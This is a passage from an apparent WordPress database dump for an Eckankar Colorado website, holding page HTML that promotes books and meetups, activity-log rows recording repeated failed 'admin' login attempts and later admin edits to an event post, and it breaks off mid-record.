style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(214788,35383,'failed_username','admin'),(214789,35383,'server_http_user_agent','Mozilla/5.0'),(214790,35383,'_message_key','user_unknown_login_failed'),(214791,35383,'_server_remote_addr','20.125.102.x'),(214792,35384,'failed_username','admin'),(214793,35384,'server_http_user_agent','Mozilla/5.0'),(214794,35384,'_message_key','user_unknown_login_failed'),(214795,35384,'_server_remote_addr','23.99.138.x'),(214796,35385,'failed_username','admin'),(214797,35385,'server_http_user_agent','Mozilla/5.0'),(214798,35385,'_message_key','user_unknown_login_failed'),(214799,35385,'_server_remote_addr','20.205.9.x'),(214800,35386,'failed_username','admin'),(214801,35386,'server_http_user_agent','Mozilla/5.0'),(214802,35386,'_message_key','user_unknown_login_failed'),(214803,35386,'_server_remote_addr','23.99.138.x'),(214804,35387,'failed_username','admin'),(214805,35387,'server_http_user_agent','Mozilla/5.0'),(214806,35387,'_message_key','user_unknown_login_failed'),(214807,35387,'_server_remote_addr','20.205.9.x'),(214808,35388,'failed_username','admin'),(214809,35388,'server_http_user_agent','Mozilla/5.0'),(214810,35388,'_message_key','user_unknown_login_failed'),(214811,35388,'_server_remote_addr','20.125.102.x'),(214812,35389,'failed_username','admin'),(214813,35389,'server_http_user_agent','Mozilla/5.0'),(214814,35389,'_message_key','user_unknown_login_failed'),(214815,35389,'_server_remote_addr','23.99.138.x'),(214816,35390,'failed_username','admin'),(214817,35390,'server_http_user_agent','Mozilla/5.0'),(214818,35390,'_message_key','user_unknown_login_failed'),(214819,35390,'_server_remote_addr','20.205.9.x'),(214820,35391,'failed_username','admin'),(214821,35391,'server_http_user_agent','Mozilla/5.0'),(214822,35391,'_message_key','user_unknown_login_failed'),(214823,35391,'_server_remote_addr','23.99.138.x'),(214824,35392,'failed_username','admin'),(214825,35392,'server_http_user_agent','Mozilla/5.0'),(214826,35392,'_message_key','user_unknown_login_failed'),(214827,35392,'_server_remote_addr','20.205.9.x'),(214828,35393,'failed_username','admin'),(214829,35393,'server_http_user_agent','Mozilla/5.0'),(214830,35393,'_message_key','user_unknown_login_failed'),(214831,35393,'_server_remote_addr','20.125.102.x'),(214832,35394,'failed_username','admin'),(214833,35394,'server_http_user_agent','Mozilla/5.0'),(214834,35394,'_message_key','user_unknown_login_failed'),(214835,35394,'_server_remote_addr','20.205.9.x'),(214836,35395,'failed_username','admin'),(214837,35395,'server_http_user_agent','Mozilla/5.0'),(214838,35395,'_message_key','user_unknown_login_failed'),(214839,35395,'_server_remote_addr','23.99.138.x'),(214840,35396,'failed_username','admin'),(214841,35396,'server_http_user_agent','Mozilla/5.0'),(214842,35396,'_message_key','user_unknown_login_failed'),(214843,35396,'_server_remote_addr','20.205.9.x'),(214844,35397,'failed_username','admin'),(214845,35397,'server_http_user_agent','Mozilla/5.0'),(214846,35397,'_message_key','user_unknown_login_failed'),(214847,35397,'_server_remote_addr','23.99.138.x'),(214848,35398,'failed_username','admin'),(214849,35398,'server_http_user_agent','Mozilla/5.0'),(214850,35398,'_message_key','user_unknown_login_failed'),(214851,35398,'_server_remote_addr','20.125.102.x'),(214852,35399,'failed_username','admin'),(214853,35399,'server_http_user_agent','Mozilla/5.0'),(214854,35399,'_message_key','user_unknown_login_failed'),(214855,35399,'_server_remote_addr','20.205.9.x'),(214856,35400,'failed_username','admin'),(214857,35400,'server_http_user_agent','Mozilla/5.0'),(214858,35400,'_message_key','user_unknown_login_failed'),(214859,35400,'_server_remote_addr','23.99.138.x'),(214860,35401,'failed_username','admin'),(214861,35401,'server_http_user_agent','Mozilla/5.0'),(214862,35401,'_message_key','user_unknown_login_failed'),(214863,35401,'_server_remote_addr','20.205.9.x'),(214864,35402,'failed_username','admin'),(214865,35402,'server_http_user_agent','Mozilla/5.0'),(214866,35402,'_message_key','user_unknown_login_failed'),(214867,35402,'_server_remote_addr','23.99.138.x'),(214868,35403,'failed_username','admin'),(214869,35403,'server_http_user_agent','Mozilla/5.0'),(214870,35403,'_message_key','user_unknown_login_failed'),(214871,35403,'_server_remote_addr','20.205.9.x'),(214872,35404,'failed_username','admin'),(214873,35404,'server_http_user_agent','Mozilla/5.0'),(214874,35404,'_message_key','user_unknown_login_failed'),(214875,35404,'_server_remote_addr','20.125.102.x'),(214876,35405,'failed_username','admin'),(214877,35405,'server_http_user_agent','Mozilla/5.0'),(214878,35405,'_message_key','user_unknown_login_failed'),(214879,35405,'_server_remote_addr','23.99.138.x'),(214880,35406,'failed_username','admin'),(214881,35406,'server_http_user_agent','Mozilla/5.0'),(214882,35406,'_message_key','user_unknown_login_failed'),(214883,35406,'_server_remote_addr','20.205.9.x'),(214884,35407,'failed_username','admin'),(214885,35407,'server_http_user_agent','Mozilla/5.0'),(214886,35407,'_message_key','user_unknown_login_failed'),(214887,35407,'_server_remote_addr','20.125.102.x'),(214888,35408,'failed_username','admin'),(214889,35408,'server_http_user_agent','Mozilla/5.0'),(214890,35408,'_message_key','user_unknown_login_failed'),(214891,35408,'_server_remote_addr','74.249.245.x'),(214892,35409,'failed_username','admin'),(214893,35409,'server_http_user_agent','Mozilla/5.0'),(214894,35409,'_message_key','user_unknown_login_failed'),(214895,35409,'_server_remote_addr','20.205.9.x'),(214896,35410,'failed_username','admin'),(214897,35410,'server_http_user_agent','Mozilla/5.0'),(214898,35410,'_message_key','user_unknown_login_failed'),(214899,35410,'_server_remote_addr','23.99.138.x'),(214900,35411,'failed_username','admin'),(214901,35411,'server_http_user_agent','Mozilla/5.0'),(214902,35411,'_message_key','user_unknown_login_failed'),(214903,35411,'_server_remote_addr','23.99.138.x'),(214904,35412,'failed_username','admin'),(214905,35412,'server_http_user_agent','Mozilla/5.0'),(214906,35412,'_message_key','user_unknown_login_failed'),(214907,35412,'_server_remote_addr','20.125.102.x'),(214908,35413,'failed_username','admin'),(214909,35413,'server_http_user_agent','Mozilla/5.0'),(214910,35413,'_message_key','user_unknown_login_failed'),(214911,35413,'_server_remote_addr','20.205.9.x'),(214912,35414,'failed_username','admin'),(214913,35414,'server_http_user_agent','Mozilla/5.0'),(214914,35414,'_message_key','user_unknown_login_failed'),(214915,35414,'_server_remote_addr','74.249.245.x'),(214916,35415,'failed_username','admin'),(214917,35415,'server_http_user_agent','Mozilla/5.0'),(214918,35415,'_message_key','user_unknown_login_failed'),(214919,35415,'_server_remote_addr','20.205.9.x'),(214920,35416,'failed_username','admin'),(214921,35416,'server_http_user_agent','Mozilla/5.0'),(214922,35416,'_message_key','user_unknown_login_failed'),(214923,35416,'_server_remote_addr','23.99.138.x'),(214924,35417,'failed_username','admin'),(214925,35417,'server_http_user_agent','Mozilla/5.0'),(214926,35417,'_message_key','user_unknown_login_failed'),(214927,35417,'_server_remote_addr','20.125.102.x'),(214928,35418,'failed_username','admin'),(214929,35418,'server_http_user_agent','Mozilla/5.0'),(214930,35418,'_message_key','user_unknown_login_failed'),(214931,35418,'_server_remote_addr','74.249.245.x'),(214932,35419,'failed_username','admin'),(214933,35419,'server_http_user_agent','Mozilla/5.0'),(214934,35419,'_message_key','user_unknown_login_failed'),(214935,35419,'_server_remote_addr','20.205.9.x'),(214936,35420,'failed_username','admin'),(214937,35420,'server_http_user_agent','Mozilla/5.0'),(214938,35420,'_message_key','user_unknown_login_failed'),(214939,35420,'_server_remote_addr','23.99.138.x'),(214940,35421,'failed_username','admin'),(214941,35421,'server_http_user_agent','Mozilla/5.0'),(214942,35421,'_message_key','user_unknown_login_failed'),(214943,35421,'_server_remote_addr','20.125.102.x'),(214944,35422,'failed_username','admin'),(214945,35422,'server_http_user_agent','Mozilla/5.0'),(214946,35422,'_message_key','user_unknown_login_failed'),(214947,35422,'_server_remote_addr','74.249.245.x'),(214948,35423,'failed_username','admin'),(214949,35423,'server_http_user_agent','Mozilla/5.0'),(214950,35423,'_message_key','user_unknown_login_failed'),(214951,35423,'_server_remote_addr','20.205.9.x'),(214952,35424,'failed_username','admin'),(214953,35424,'server_http_user_agent','Mozilla/5.0'),(214954,35424,'_message_key','user_unknown_login_failed'),(214955,35424,'_server_remote_addr','23.99.138.x'),(214956,35425,'failed_username','admin'),(214957,35425,'server_http_user_agent','Mozilla/5.0'),(214958,35425,'_message_key','user_unknown_login_failed'),(214959,35425,'_server_remote_addr','20.125.102.x'),(214960,35426,'failed_username','admin'),(214961,35426,'server_http_user_agent','Mozilla/5.0'),(214962,35426,'_message_key','user_unknown_login_failed'),(214963,35426,'_server_remote_addr','74.249.245.x'),(214964,35427,'failed_username','admin'),(214965,35427,'server_http_user_agent','Mozilla/5.0'),(214966,35427,'_message_key','user_unknown_login_failed'),(214967,35427,'_server_remote_addr','20.205.9.x'),(214968,35428,'failed_username','admin'),(214969,35428,'server_http_user_agent','Mozilla/5.0'),(214970,35428,'_message_key','user_unknown_login_failed'),(214971,35428,'_server_remote_addr','23.99.138.x'),(214972,35429,'failed_username','admin'),(214973,35429,'server_http_user_agent','Mozilla/5.0'),(214974,35429,'_message_key','user_unknown_login_failed'),(214975,35429,'_server_remote_addr','74.249.245.x'),(214976,35430,'failed_username','admin'),(214977,35430,'server_http_user_agent','Mozilla/5.0'),(214978,35430,'_message_key','user_unknown_login_failed'),(214979,35430,'_server_remote_addr','20.125.102.x'),(214980,35431,'failed_username','admin'),(214981,35431,'server_http_user_agent','Mozilla/5.0'),(214982,35431,'_message_key','user_unknown_login_failed'),(214983,35431,'_server_remote_addr','20.205.9.x'),(214984,35432,'failed_username','admin'),(214985,35432,'server_http_user_agent','Mozilla/5.0'),(214986,35432,'_message_key','user_unknown_login_failed'),(214987,35432,'_server_remote_addr','74.249.245.x'),(214988,35433,'failed_username','admin'),(214989,35433,'server_http_user_agent','Mozilla/5.0'),(214990,35433,'_message_key','user_unknown_login_failed'),(214991,35433,'_server_remote_addr','23.99.138.x'),(214992,35434,'failed_username','admin'),(214993,35434,'server_http_user_agent','Mozilla/5.0'),(214994,35434,'_message_key','user_unknown_login_failed'),(214995,35434,'_server_remote_addr','20.125.102.x'),(214996,35435,'failed_username','admin'),(214997,35435,'server_http_user_agent','Mozilla/5.0'),(214998,35435,'_message_key','user_unknown_login_failed'),(214999,35435,'_server_remote_addr','74.249.245.x'),(215000,35436,'failed_username','admin'),(215001,35436,'server_http_user_agent','Mozilla/5.0'),(215002,35436,'_message_key','user_unknown_login_failed'),(215003,35436,'_server_remote_addr','23.99.138.x'),(215004,35437,'failed_username','admin'),(215005,35437,'server_http_user_agent','Mozilla/5.0'),(215006,35437,'_message_key','user_unknown_login_failed'),(215007,35437,'_server_remote_addr','20.125.102.x'),(215008,35438,'failed_username','admin'),(215009,35438,'server_http_user_agent','Mozilla/5.0'),(215010,35438,'_message_key','user_unknown_login_failed'),(215011,35438,'_server_remote_addr','74.249.245.x'),(215012,35439,'failed_username','admin'),(215013,35439,'server_http_user_agent','Mozilla/5.0'),(215014,35439,'_message_key','user_unknown_login_failed'),(215015,35439,'_server_remote_addr','23.99.138.x'),(215016,35440,'failed_username','admin'),(215017,35440,'server_http_user_agent','Mozilla/5.0'),(215018,35440,'_message_key','user_unknown_login_failed'),(215019,35440,'_server_remote_addr','20.81.40.x'),(215020,35441,'failed_username','admin'),(215021,35441,'server_http_user_agent','Mozilla/5.0'),(215022,35441,'_message_key','user_unknown_login_failed'),(215023,35441,'_server_remote_addr','20.125.102.x'),(215024,35442,'failed_username','admin'),(215025,35442,'server_http_user_agent','Mozilla/5.0'),(215026,35442,'_message_key','user_unknown_login_failed'),(215027,35442,'_server_remote_addr','23.99.138.x'),(215028,35443,'failed_username','admin'),(215029,35443,'server_http_user_agent','Mozilla/5.0'),(215030,35443,'_message_key','user_unknown_login_failed'),(215031,35443,'_server_remote_addr','20.125.102.x'),(215032,35444,'failed_username','admin'),(215033,35444,'server_http_user_agent','Mozilla/5.0'),(215034,35444,'_message_key','user_unknown_login_failed'),(215035,35444,'_server_remote_addr','74.249.245.x'),(215036,35445,'failed_username','admin'),(215037,35445,'server_http_user_agent','Mozilla/5.0'),(215038,35445,'_message_key','user_unknown_login_failed'),(215039,35445,'_server_remote_addr','20.81.40.x'),(215040,35446,'failed_username','admin'),(215041,35446,'server_http_user_agent','Mozilla/5.0'),(215042,35446,'_message_key','user_unknown_login_failed'),(215043,35446,'_server_remote_addr','23.99.138.x'),(215044,35447,'failed_username','admin'),(215045,35447,'server_http_user_agent','Mozilla/5.0'),(215046,35447,'_message_key','user_unknown_login_failed'),(215047,35447,'_server_remote_addr','20.125.102.x'),(215048,35448,'failed_username','admin'),(215049,35448,'server_http_user_agent','Mozilla/5.0'),(215050,35448,'_message_key','user_unknown_login_failed'),(215051,35448,'_server_remote_addr','74.249.245.x'),(215052,35449,'failed_username','admin'),(215053,35449,'server_http_user_agent','Mozilla/5.0'),(215054,35449,'_message_key','user_unknown_login_failed'),(215055,35449,'_server_remote_addr','23.99.138.x'),(215056,35450,'failed_username','admin'),(215057,35450,'server_http_user_agent','Mozilla/5.0'),(215058,35450,'_message_key','user_unknown_login_failed'),(215059,35450,'_server_remote_addr','20.125.102.x'),(215060,35451,'failed_username','admin'),(215061,35451,'server_http_user_agent','Mozilla/5.0'),(215062,35451,'_message_key','user_unknown_login_failed'),(215063,35451,'_server_remote_addr','74.249.245.x'),(215064,35452,'failed_username','admin'),(215065,35452,'server_http_user_agent','Mozilla/5.0'),(215066,35452,'_message_key','user_unknown_login_failed'),(215067,35452,'_server_remote_addr','20.81.40.x'),(215068,35453,'failed_username','admin'),(215069,35453,'server_http_user_agent','Mozilla/5.0'),(215070,35453,'_message_key','user_unknown_login_failed'),(215071,35453,'_server_remote_addr','74.249.245.x'),(215072,35454,'failed_username','admin'),(215073,35454,'server_http_user_agent','Mozilla/5.0'),(215074,35454,'_message_key','user_unknown_login_failed'),(215075,35454,'_server_remote_addr','20.125.102.x'),(215076,35455,'failed_username','admin'),(215077,35455,'server_http_user_agent','Mozilla/5.0'),(215078,35455,'_message_key','user_unknown_login_failed'),(215079,35455,'_server_remote_addr','20.125.102.x'),(215080,35456,'failed_username','admin'),(215081,35456,'server_http_user_agent','Mozilla/5.0'),(215082,35456,'_message_key','user_unknown_login_failed'),(215083,35456,'_server_remote_addr','74.249.245.x'),(215084,35457,'failed_username','admin'),(215085,35457,'server_http_user_agent','Mozilla/5.0'),(215086,35457,'_message_key','user_unknown_login_failed'),(215087,35457,'_server_remote_addr','20.81.40.x'),(215088,35458,'failed_username','admin'),(215089,35458,'server_http_user_agent','Mozilla/5.0'),(215090,35458,'_message_key','user_unknown_login_failed'),(215091,35458,'_server_remote_addr','74.249.245.x'),(215092,35459,'failed_username','admin'),(215093,35459,'server_http_user_agent','Mozilla/5.0'),(215094,35459,'_message_key','user_unknown_login_failed'),(215095,35459,'_server_remote_addr','20.125.102.x'),(215096,35460,'failed_username','admin'),(215097,35460,'server_http_user_agent','Mozilla/5.0'),(215098,35460,'_message_key','user_unknown_login_failed'),(215099,35460,'_server_remote_addr','20.125.102.x'),(215100,35461,'failed_username','admin'),(215101,35461,'server_http_user_agent','Mozilla/5.0'),(215102,35461,'_message_key','user_unknown_login_failed'),(215103,35461,'_server_remote_addr','20.81.40.x'),(215104,35462,'failed_username','admin'),(215105,35462,'server_http_user_agent','Mozilla/5.0'),(215106,35462,'_message_key','user_unknown_login_failed'),(215107,35462,'_server_remote_addr','74.249.245.x'),(215108,35463,'failed_username','admin'),(215109,35463,'server_http_user_agent','Mozilla/5.0'),(215110,35463,'_message_key','user_unknown_login_failed'),(215111,35463,'_server_remote_addr','20.125.102.x'),(215112,35464,'failed_username','admin'),(215113,35464,'server_http_user_agent','Mozilla/5.0'),(215114,35464,'_message_key','user_unknown_login_failed'),(215115,35464,'_server_remote_addr','74.249.245.x'),(215116,35465,'failed_username','admin'),(215117,35465,'server_http_user_agent','Mozilla/5.0'),(215118,35465,'_message_key','user_unknown_login_failed'),(215119,35465,'_server_remote_addr','74.249.245.x'),(215120,35466,'failed_username','admin'),(215121,35466,'server_http_user_agent','Mozilla/5.0'),(215122,35466,'_message_key','user_unknown_login_failed'),(215123,35466,'_server_remote_addr','20.81.40.x'),(215124,35467,'failed_username','admin'),(215125,35467,'server_http_user_agent','Mozilla/5.0'),(215126,35467,'_message_key','user_unknown_login_failed'),(215127,35467,'_server_remote_addr','74.249.245.x'),(215128,35468,'failed_username','admin'),(215129,35468,'server_http_user_agent','Mozilla/5.0'),(215130,35468,'_message_key','user_unknown_login_failed'),(215131,35468,'_server_remote_addr','74.249.245.x'),(215132,35469,'failed_username','admin'),(215133,35469,'server_http_user_agent','Mozilla/5.0'),(215134,35469,'_message_key','user_unknown_login_failed'),(215135,35469,'_server_remote_addr','20.81.40.x'),(215136,35470,'failed_username','admin'),(215137,35470,'server_http_user_agent','Mozilla/5.0'),(215138,35470,'_message_key','user_unknown_login_failed'),(215139,35470,'_server_remote_addr','74.249.245.x'),(215140,35471,'failed_username','admin'),(215141,35471,'server_http_user_agent','Mozilla/5.0'),(215142,35471,'_message_key','user_unknown_login_failed'),(215143,35471,'_server_remote_addr','74.249.245.x'),(215144,35472,'failed_username','admin'),(215145,35472,'server_http_user_agent','Mozilla/5.0'),(215146,35472,'_message_key','user_unknown_login_failed'),(215147,35472,'_server_remote_addr','74.249.245.x'),(215148,35473,'failed_username','admin'),(215149,35473,'server_http_user_agent','Mozilla/5.0'),(215150,35473,'_message_key','user_unknown_login_failed'),(215151,35473,'_server_remote_addr','20.81.40.x'),(215152,35474,'failed_username','admin'),(215153,35474,'server_http_user_agent','Mozilla/5.0'),(215154,35474,'_message_key','user_unknown_login_failed'),(215155,35474,'_server_remote_addr','74.249.245.x'),(215156,35475,'failed_username','admin'),(215157,35475,'server_http_user_agent','Mozilla/5.0'),(215158,35475,'_message_key','user_unknown_login_failed'),(215159,35475,'_server_remote_addr','74.249.245.x'),(215160,35476,'failed_username','admin'),(215161,35476,'server_http_user_agent','Mozilla/5.0'),(215162,35476,'_message_key','user_unknown_login_failed'),(215163,35476,'_server_remote_addr','20.81.40.x'),(215164,35477,'failed_username','admin'),(215165,35477,'server_http_user_agent','Mozilla/5.0'),(215166,35477,'_message_key','user_unknown_login_failed'),(215167,35477,'_server_remote_addr','74.249.245.x'),(215168,35478,'failed_username','admin'),(215169,35478,'server_http_user_agent','Mozilla/5.0'),(215170,35478,'_message_key','user_unknown_login_failed'),(215171,35478,'_server_remote_addr','74.249.245.x'),(215172,35479,'failed_username','admin'),(215173,35479,'server_http_user_agent','Mozilla/5.0'),(215174,35479,'_message_key','user_unknown_login_failed'),(215175,35479,'_server_remote_addr','20.81.40.x'),(215176,35480,'failed_username','admin'),(215177,35480,'server_http_user_agent','Mozilla/5.0'),(215178,35480,'_message_key','user_unknown_login_failed'),(215179,35480,'_server_remote_addr','74.249.245.x'),(215180,35481,'failed_username','admin'),(215181,35481,'server_http_user_agent','Mozilla/5.0'),(215182,35481,'_message_key','user_unknown_login_failed'),(215183,35481,'_server_remote_addr','74.249.245.x'),(215184,35482,'failed_username','admin'),(215185,35482,'server_http_user_agent','Mozilla/5.0'),(215186,35482,'_message_key','user_unknown_login_failed'),(215187,35482,'_server_remote_addr','74.249.245.x'),(215188,35483,'failed_username','admin'),(215189,35483,'server_http_user_agent','Mozilla/5.0'),(215190,35483,'_message_key','user_unknown_login_failed'),(215191,35483,'_server_remote_addr','20.81.40.x'),(215192,35484,'failed_username','admin'),(215193,35484,'server_http_user_agent','Mozilla/5.0'),(215194,35484,'_message_key','user_unknown_login_failed'),(215195,35484,'_server_remote_addr','74.249.245.x'),(215196,35485,'failed_username','admin'),(215197,35485,'server_http_user_agent','Mozilla/5.0'),(215198,35485,'_message_key','user_unknown_login_failed'),(215199,35485,'_server_remote_addr','74.249.245.x'),(215200,35486,'failed_username','admin'),(215201,35486,'server_http_user_agent','Mozilla/5.0'),(215202,35486,'_message_key','user_unknown_login_failed'),(215203,35486,'_server_remote_addr','20.81.40.x'),(215204,35487,'failed_username','admin'),(215205,35487,'server_http_user_agent','Mozilla/5.0'),(215206,35487,'_message_key','user_unknown_login_failed'),(215207,35487,'_server_remote_addr','74.249.245.x'),(215208,35488,'user_id','15'),(215209,35488,'user_email','nadazipought@zilch.org'),(215210,35488,'user_login','john-admin-96'),(215211,35488,'_user_id','15'),(215212,35488,'_user_login','john-admin-96'),(215213,35488,'_user_email','nadazipought@zilch.org'),(215214,35488,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(215215,35488,'_message_key','user_logged_in'),(215216,35488,'_server_remote_addr','174.16.132.x'),(215217,35488,'_server_http_referer','https://eckankar-colorado.org/wp-login.php'),(215218,35489,'post_id','269121'),(215219,35489,'post_type','mec-events'),(215220,35489,'post_title','Copy of Manifest Your Heart’s Desire'),(215221,35489,'_message_key','post_updated'),(215222,35489,'_user_id','15'),(215223,35489,'_user_login','john-admin-96'),(215224,35489,'_user_email','nadazipought@zilch.org'),(215225,35489,'_server_remote_addr','174.16.132.x'),(215226,35489,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=mec-events'),(215227,35490,'post_id','269121'),(215228,35490,'post_type','mec-events'),(215229,35490,'post_title','Achieving Spiritual Freedom in this Lifetime'),(215230,35490,'post_new_thumb_id','269119'),(215231,35490,'post_new_thumb_title','GoldenHeart2'),(215232,35490,'post_meta_added','78'),(215233,35490,'_message_key','post_updated'),(215234,35490,'_user_id','15'),(215235,35490,'_user_login','john-admin-96'),(215236,35490,'_user_email','nadazipought@zilch.org'),(215237,35490,'_server_remote_addr','174.16.132.x'),(215238,35490,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269121&action=edit'),(215239,35491,'post_type','attachment'),(215240,35491,'attachment_id','269122'),(215241,35491,'attachment_title','TemplePool'),(215242,35491,'attachment_filename','TemplePool.webp'),(215243,35491,'attachment_mime','image/webp'),(215244,35491,'attachment_filesize','13332'),(215245,35491,'attachment_parent_id','269121'),(215246,35491,'attachment_parent_title','Achieving Spiritual Freedom in this Lifetime'),(215247,35491,'attachment_parent_post_type','mec-events'),(215248,35491,'_message_key','attachment_created'),(215249,35491,'_user_id','15'),(215250,35491,'_user_login','john-admin-96'),(215251,35491,'_user_email','nadazipought@zilch.org'),(215252,35491,'_server_remote_addr','174.16.132.x'),(215253,35491,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269121&action=edit'),(215254,35492,'post_id','269121'),(215255,35492,'post_type','mec-events'),(215256,35492,'post_title','Achieving Spiritual Freedom in this Lifetime'),(215257,35492,'post_new_thumb_id','269119'),(215258,35492,'post_new_thumb_title','GoldenHeart2'),(215259,35492,'post_meta_added','78'),(215260,35492,'_message_key','post_updated'),(215261,35492,'_user_id','15'),(215262,35492,'_user_login','john-admin-96'),(215263,35492,'_user_email','nadazipought@zilch.org'),(215264,35492,'_server_remote_addr','174.16.132.x'),(215265,35492,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269121&action=edit'),(215266,35493,'post_id','269121'),(215267,35493,'post_type','mec-events'),(215268,35493,'post_title','Achieving Spiritual Freedom in this Lifetime'),(215269,35493,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Spiritual Principles To Turn Dreams Into Reality<br>\n</span></strong></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"mb-4\">What is Spiritual Freedom? Are you everything you want to be? You came into this life to spread your wings and live in freedom - heart, mind and Soul!<br>\nAuthor Harold Klemp put the tools of spiritual freedom in your grasp:</p>\n<ul class=\"pl-5 list-disc mb-4\">\n	<li>Keys to embrace the highest expression of who you really are</li>\n	<li>Techniques to tap into the divine Life Force for unlimited creativity and problem solving</li>\n	